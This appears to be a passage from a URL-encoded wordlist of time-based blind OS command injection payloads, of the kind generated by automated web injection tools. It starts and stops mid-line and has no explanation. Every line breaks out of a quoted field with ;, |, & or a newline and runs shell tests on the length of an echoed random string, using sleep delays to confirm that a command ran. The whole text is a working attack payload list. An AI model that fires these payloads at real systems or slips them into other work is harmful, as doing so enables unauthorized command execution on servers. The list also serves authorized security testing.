7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20JYVQFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%0A%20str%3D%24%28echo%20SYNSAC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20IVNSBH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20EHUILY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YTDCVX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%0A%20str%3D%24%28echo%20HFKZYC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20LMZYDH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20CROOYG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFBEAG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%0A%20str%3D%24%28echo%20YQOMCI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%